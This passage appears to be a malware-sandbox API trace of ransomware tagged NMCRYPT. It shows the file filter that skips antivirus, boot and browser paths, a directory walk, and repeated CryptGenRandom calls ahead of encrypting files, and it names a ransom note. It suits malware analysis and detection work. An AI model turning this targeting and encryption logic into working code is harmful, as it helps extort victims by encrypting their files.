pszSpec="*\\winrar\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\java\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\windows\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\ESET\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\AVG\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\AVIRA\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*Atheros*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*Realtek*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*bootmgr*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*boot*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*boot*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*CONFIG.SYS*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*IO.SYS*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*MSDOS.SYS*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*NTDETECT.COM*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*ntldr*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*chrome*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*opera*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*firefox*") returned 0 [0155.607] wcslen (_String="\\\\?\\") returned 0x4 [0155.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad478 [0155.608] wcscmp (_String1=".", _String2=".") returned 0 [0155.608] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0155.608] wcscmp (_String1="..", _String2=".") returned 1 [0155.608] wcscmp (_String1="..", _String2="..") returned 0 [0155.608] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*NMCRYPT") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*Recovers your files.html") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.exe") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.dll") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.lnk") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.bat") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.ini") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.msi") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*.scf") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*pagefile.sys*") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*AppData*") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\winrar\\*") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\java\\*") returned 0 [0155.608] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\windows\\*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\ESET\\*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\AVG\\*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*Atheros*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*Realtek*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*bootmgr*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*boot*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*boot*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*IO.SYS*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*ntldr*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*chrome*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*opera*") returned 0 [0155.609] PathMatchSpecW (pszFile="auxbase.xml", pszSpec="*firefox*") returned 0 [0155.609] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", pszSpec="*") returned 1 [0155.609] strlen (_Str="NMoreira") returned 0x8 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.609] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.610] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.611] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, 